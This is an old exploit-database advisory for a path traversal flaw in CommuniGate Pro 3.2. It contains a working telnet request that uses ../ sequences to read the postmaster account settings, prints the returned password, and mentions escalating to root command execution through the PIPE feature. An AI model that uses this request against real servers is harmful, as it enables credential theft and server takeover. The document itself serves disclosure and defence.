CommuniGate Pro Arbitrary File Access Vulnerability

vendor:

CommuniGate Pro

by:

SecurityFocus

7.5

CVSS

HIGH

Arbitrary File Access

CWE

Product Name: CommuniGate Pro

Affected Version From: 3.2.2004

Affected Version To: 3.2.2004

Patch Exists: YES

Related CWE: N/A

CPE: a:stalker:communigate_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2000

CommuniGate Pro Arbitrary File Access Vulnerability

It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root.

Mitigation:

Restrict access to the vulnerable system and ensure that all software is up to date.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1493/info

A vulnerability exists in the CommuniGate Pro product, from Stalker. It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root. 

Retrieve the postmaster/manager configuration file:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$

Using this information, it is possible to alter the configuration on the mail server to allow execution using its PIPE feature.